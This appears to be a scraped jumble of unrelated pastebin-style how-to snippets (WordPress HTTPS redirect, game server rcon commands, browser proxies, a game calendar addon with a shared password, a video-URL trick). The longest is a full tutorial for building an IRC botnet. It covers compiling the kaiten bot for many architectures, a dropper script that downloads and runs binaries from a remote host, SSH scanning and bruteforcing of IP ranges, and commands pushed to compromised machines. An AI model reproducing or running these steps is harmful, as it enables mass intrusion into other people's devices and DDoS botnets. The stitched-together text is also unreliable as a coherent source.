How to Setup WordPress to Use SSL and HTTPS

How to Setup WordPress to Use SSL and HTTPS

If you are starting a new site and/or want to use HTTPS everywhere on your site, then you need to update your site URL.
You can do this by going to Settings » General and updating your WordPress and site URL address fields.

Add to .htaccess

<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{SERVER_PORT} 80 
RewriteRule ^(.*)$ https://www.yoursite.com/$1 [R,L]
</IfModule>

HOW TO SET UP A SERVER W/RCON

HOW TO SET UP A SERVER W/RCON


 
1. Connect to server
2. type in console rcon_address [68.58.97.65:27015] (No Password, Just port and ip)
3. type rcon_password [Insert Password Here]
4. To test if you did it right, type rcon say dsjkalfjsl and see if it appears in chat
 
Now to set it up
5. First, Change the map by using this command
rcon changelevel [Insert map name here] (Make sure the name is exact ex pl_swiftwater_ugc)
 
6. Now you need to change the config
rcon exec [Insert Config here] (Make sure name is exact)
 
KOTH = ugc_HL_koth
5CP = ugc_HL_standard
PL = ugc_HL_stopwatch

// ESEA 6v6 Configs
alias esea_ctf "rcon exec esea_ctf"
alias esea_koth "rcon exec esea_koth"
alias esea_push "rcon exec esea_push"
alias esea_standard "esea_push"
alias esea_std "esea_push"
alias esea_stopwatch "rcon exec esea_stopwatch"
alias esea_off "rcon exec esea_off"
alias ESEA "alias config_standard esea_push; alias config_koth esea_koth; alias config_stopwatch esea_stopwatch; alias config_golden; alias config_tugofwar; alias config_ctf esea_ctf; alias config_off esea_off; echo ESEA 6V6 Config loaded."

tf_preround_push_from_damage_enable

How To Set Up Proxies In Your Browser

How To Set Up Proxies In Your Browser


How To Set Up Proxies In Your Browser

This is a small Tutor - try it out!

===================================
How to set up proxies in your browser, (!!!!be anonymous and make the passes last longer...!!!!!!
===================================
In Internet Explorer
===================================
Click "Tools", then "Internet Options", the in the "connections" Tab, click the "LAN Setup" Button in the bottom. There is a "Proxy Servers", tick the "Use a proxy....." and then enter the proxy in the bigger textbox and the port (the part that comes after the ":") in the smaller textbox. Hit okay, and then go to
CODE
www.whatismyip.com
to see if the proxy is now your IP.
===================================
In OPERA
===================================
Click "Files", then "Preferences", then "Network", then click the button "Proxy Servers", tick "HTTP", fill in with the proxy:port, click okay and that's it! Don't forget to check with
CODE
www.whatismyip.com

===================================
In Firefox
===================================
Tools -> Options
Then click the General Icon
Then the "Connection Settings..." button
Then click the "manually configure proxies" radio button, and enter the proxy address and port in the HTTP Proxy area.
Don't forget to check with
CODE
www.whatismyip.com


CODE
www.proxy4free.com
www.safeproxy.org
www.megaproxy.com
www.guardster.com
www.silenter.com
www.anonymizer.com


Happy Anonymous surfing!


To be clear: if I give you 255.255.255.255:8080, that means 255.255.255.255 is the proxy and 8080 is the port
To Optain Fresh and new proxies,u can alvays check Google...
my skype : yamod.gas
contact me for more/help ! :)

HOW TO SETUP LRAB AND UNREAL

HOW TO SETUP LRAB AND UNREAL


COMPLETE LRAB AND UNREAL SETUP GUIDE BY NRPE :) WILL NEED 1 or 2 SERVER FOR THIS HMU ON KIK-ableton

UNREAL SETUP WITH SOME DOWNLOADS FOR LRAB SO MAKE SURE TO DOWNLOAD ALL THIS STUFF EVEN IF YOU ALREADY HAVE AN IRC SETUP ALSO FOR NOTE IF YOU WANT CNC INSTEAD OF IRC FOLLOW THROUGH TUT BUT REPLACE KAITEN.C WITH CLIENT.C ITS SAME CONCEPT

apt-get install libssl-dev
apt-get install make gcc nano tar wget unzip perl

yum install openssl-devel
yum install make gcc nano tar wget unzip perl

wget https://www.unrealircd.org/unrealircd4/unrealircd-4.0.5.tar.gz 

tar -zxvf unrealircd-4.0.5.tar.gz 

cd unrealircd-4.0.5

./Config (hit enter a million times)

make

make install

cd unrealircd/conf/examples

nano example.conf (edit and save as unrealircd.conf)

mv unrealircd.conf /root/unrealircd/conf

cd ..

./unrealircd start


LRAB SETUP NOW!

First step is to change Max ssh connections so you don't get capped 

Type nano /etc/sshd_config or nano /etc/ssh/sshd_config

Press ctrl-w and search MaxStartups change it to like 20000 or something higher type ctrl-o save it and exit with ctrl-x now type 

service sshd restart (Centos) or 
sudo /etc/init.d/ssh restart (Debian/Ubuntu)

Now it's time to install Apache

Centos-u need to install httpd(apache) so type 

sudo yum install httpd 

once installed type 

sudo /usr/sbin/apachectl start

Ubuntu/debian- sudo apt-get install apache2 and then after it installs type sudo /etc/init.d/apache2 start

you should get this message from either distro if successful 

"Starting httpd: httpd: Could not reliably determine the server's fully qualified domain name, using (your server ip) for ServerName" 

after installing and running apache you want to download these few things make sure your in root directory if unsure type cd /root 
now type the following commands 

wget http://www.zonesec.org/LRAB.zip
 
unzip LRAB.zip

that will unzip LRAB and make the directory 

now you need to download & configure your kaiten.c to your IRC, kaiten.c can be found here don't wget this link use web browser 

http://pastebin.com/bdGTV2zp

Go to link click raw copy the whole kaiten script go back to server type nano kaiten.c then right click/paste then type ctrl-o enter and ctrl-x
 
once you have it configured type mv kaiten.c /var/www/html

Next you want to cd into LRAB and type mkdir bin then you want to cd into bin(cd bin) and type nano s.sh and copy this 


wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2 && tar -xvjf cross-compiler-x86_64.tar.bz2 && rm -rf cross-compiler-x86_64.tar.bz2 

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2 && tar -xvjf cross-compiler-armv4l.tar.bz2 && rm -rf cross-compiler-armv4l.tar.bz2

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2 && tar -xvjf cross-compiler-i686.tar.bz2 && rm -rf cross-compiler-i686.tar.bz2

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2 && tar -xvjf cross-compiler-armv5l.tar.bz2 && rm -rf cross-compiler-armv5l.tar.bz2

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2 && tar -xvjf cross-compiler-i586.tar.bz2 && rm -rf cross-compiler-i586.tar.bz2 

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2 && tar -xvjf cross-compiler-m68k.tar.bz2 && rm -rf cross-compiler-m68k.tar.bz2 

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2 && tar -xvjf cross-compiler-mips.tar.bz2 && rm -rf cross-compiler-mips.tar.bz2

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2 && tar -xvjf cross-compiler-mipsel.tar.bz2 && rm -rf cross-compiler-mipsel.tar.bz2 

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc-440fp.tar.bz2 && tar -xvjf cross-compiler-powerpc-440fp.tar.bz2 && rm -rf cross-compiler-powerpc-440fp.tar.bz2

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2 && tar -xvjf cross-compiler-powerpc.tar.bz2 && rm -rf cross-compiler-powerpc.tar.bz2 

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2 && tar -xvjf cross-compiler-sh4.tar.bz2 && rm -rf cross-compiler-sh4.tar.bz2

wget https://uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2 && tar -xvjf cross-compiler-sparc.tar.bz2 && rm -rf cross-compiler-sparc.tar.bz2

once you have pasted that you then want to save it and type chmod 777 * and then type sh s.sh then let it do its thing 

Now your going to want to type cd /root/LRAB/bin after that your going to want to cd into every cross compiler and compile it with kaiten.c example shown below you can also cross compile it with client.c for cnc it's same concept just have to follow how to edit that it's not hard but I'm
Not putting it in this tutorial anyways...

** Example for IRC/kaiten way **

* NOTE for this part sometimes typing the gcc it will give an error if it does that copy and paste the gcc file example powerpc-440fp-gcc

cd cross-compiler-powerpc440fp/bin
wget http://1.1.1.1/kaiten.c 
./powerpc-440fp-gcc -o ppc440 kaiten.c
mv mipsel /var/www/html

** Example for CNC/client way **

cd cross-compiler-powerpc440fp/bin
wget http://1.1.1.1/client.c
./powerpc-440fp-gcc -o ppc440 client.c -lpthread
mv mipsel /var/www/html


NOTE-make sure when cross compiling the file you name it to matches the ones in the wget link below!

do this exact step with each one make sure you doing the whatever-gcc file! its annoying but rewarding at the end :) also remember you can always type cd .. to go back a directory!

So now you want to type cd /var/www/html and then type nano gb.sh and then edit and copy this 

#!/bin/sh

wget -c http://1.1.1.1/armv5l -P /var/run && chmod +x /var/run/armv5l && /var/run/armv5l
wget -c http://1.1.1.1/mips -P /var/run && chmod +x /var/run/mips && /var/run/mips
wget -c http://1.1.1.1/mipsel -P /var/run && chmod +x /var/run/mipsel && /var/run/mipsel
wget -c http://1.1.1.1/ppc -P /var/run && chmod +x /var/run/ppc && /var/run/ppc
wget -c http://1.1.1.1/sh4 -P /var/run && chmod +x /var/run/sh4 && /var/run/sh4
wget -c http://1.1.1.1/x86_64 -P /var/run && chmod +x /var/run/x86_64 && /var/run/x86_64 
wget -c http://1.1.1.1/armv41 -P /var/run && chmod +x /var/run/armv41 && /var/run/armv41
wget -c http://1.1.1.1/i586 -P /var/run && chmod +x /var/run/i586 && /var/run/i586
wget -c http://1.1.1.1/i686 -P /var/run && chmod +x /var/run/i686 && /var/run/i686
wget -c http://1.1.1.1/ppc440 -P /var/run && chmod +x /var/run/ppc440 && /var/run/ppc440
wget -c http://1.1.1.1/m68k -P /var/run && chmod +x /var/run/m68k && /var/run/m68k
wget -c http://1.1.1.1/sparc -P /var/run && chmod +x /var/run/sparc && /var/run/sparc



sleep 3;
rm -fr /var/run/gb.sh

After that you want to save it and type chmod 777 * 

now for the next step 

apt-get install build-essential libssh2-1-dev

apt-get install php5-dev

apt-get install php-pear

cpan -i IO::Socket

cpan -i IO::Select 

cpan -i Parallel::ForkManager

cpan -i Net::SSH2

** if it says " No makefile was created " after you tried to install net:ssh2 **

do all of these commands in order one after another ONLY if you got the no makefile error if you didn't get error skip to cli.pl part

yum install php-devel php-pear libssh2 libssh2-devel

pecl install -f ssh2

touch /etc/php.d/ssh2.ini

echo extension=ssh2.so > /etc/php.d/ssh2.ini

after that run cpan -i Net::SSH2 again and it should work

now in your cli.pl file your going to look for this  

$channel->exec('rm -rf /tmp/*; wget -q http://176.123.7.39/jsf.sh -O /tmp/jsf.sh; sh /tmp/jsf.sh; rm -rf /tmp/*.sh'); 

once you have changed it it should look like this 

$channel->exec('rm -rf /tmp/*; wget -q http://1.1.1.1/gb.sh -O /tmp/gb.sh; sh /tmp/gb.sh; rm -rf /tmp/*.sh'); 

ok now your done with that your gonna want to scan for ip lists so now you want to do this

./class PORT -a IP -i INTERFACE -s 10

example- ./class 22 -a 192 -i eth0 -s 10 

NOTE- if it says you dont have permission just type chmod 777 * and rerun it and you should be all good just do that one time

if your unsure of what interface your on type ifconfig (usually is eth0)

okay now after the scan is done it creates a file named bios.txt with the ips from the scan

now you want to type nano bios.txt and type CTRL-o and rename it to mfu.txt press y for yes to save it as new name then CTRL-x to exit

okay just to make sure type ls and make sure theres bios.txt and mfu.txt and also double check to make sure it saved properly and the ips you scanned are there nano mfu.txt make sure same amount of ips are in there before next step!

once thats done scanning your range and youve edited the txt files you want to type

./update 1000

wait till its done bruteforcing (takes a while so be pateint also will stop randomly but just let it do its thing unlless its just simply froze it can take many hours so its wise to let it run its course) or you can manually stop it with CTRL+C

the end result will give you a new file called vuln.txt 

now you want to nano into cli.pl and look for this  

open(fh,'<',$file); @newarray; while (<fh>){ @array = split(':',$_);

end result after editing should look like this 

open(fh,'<','vuln.txt'); @newarray; while (<fh>){ @array = split(':',$_);

now type perl cli.pl and and let that do its thing and the bots will join your irc chan :)

now you are a certified 1337 hax0r b0t L0rd congrats!

~nrpe

How to set up sdless a9lh

How to set up sdless a9lh. I removed the rest of the guide as Plailect updated his guide.


1. Do this https://plailect.github.io/Guide/updating-a9lh

you now have sdless a9lh.

keep the arm9loaderhax.bin on your sd card, it's best to leave it so it is easier to update Luma and games that need to reboot the system wont work without it. just use the sdless as a fallback.

How to set up group calendar, including link to download addon:

How to set up group calendar, including link to download addon:

Addon is at: https://drive.google.com/uc?export=download&id=0BzejAmVDt2AcUmszUEszQWJQakU

Download it and enable it, then when you get in game you press the clock symbol by the minimap to get in the Calendar view. Go under Setup and cross "Use shared data channel", use Channel: Kraftig Password: Peace

Wait for the addon to syncronize to network (3 minutes), and after that you should be able to see the events. Everyone can put up events but please do not abuse this, keep it clean.

As for raid attendance: Put down if you're attending and you will be put as Standby for the raid. Before the raid (I will try 24 hours before) I will manually confirm those that are attending and who should remain on standby. Being on Standby means you're there at invite time or otherwise available through Discord. Failure to attend a raid that you've marked yourself "attending" on is a crime punishable by death!

How to download videos on Beeg.com

 Download videos on Beeg.com


beeg url exploit 

each video on beeg has it's own ID which are the last few numbers in the URL.

as an example:
the ID of this video
/// http://beeg.com/8597253
is 8597253

all you have to do is paste the ID into this url where it says "ID"
/// http://0.video.mystreamservice.com/480p/ID.mp4
the url to the example video would be 
/// http://0.video.mystreamservice.com/480p/8597253.mp4
go to the url, right click the video, and save as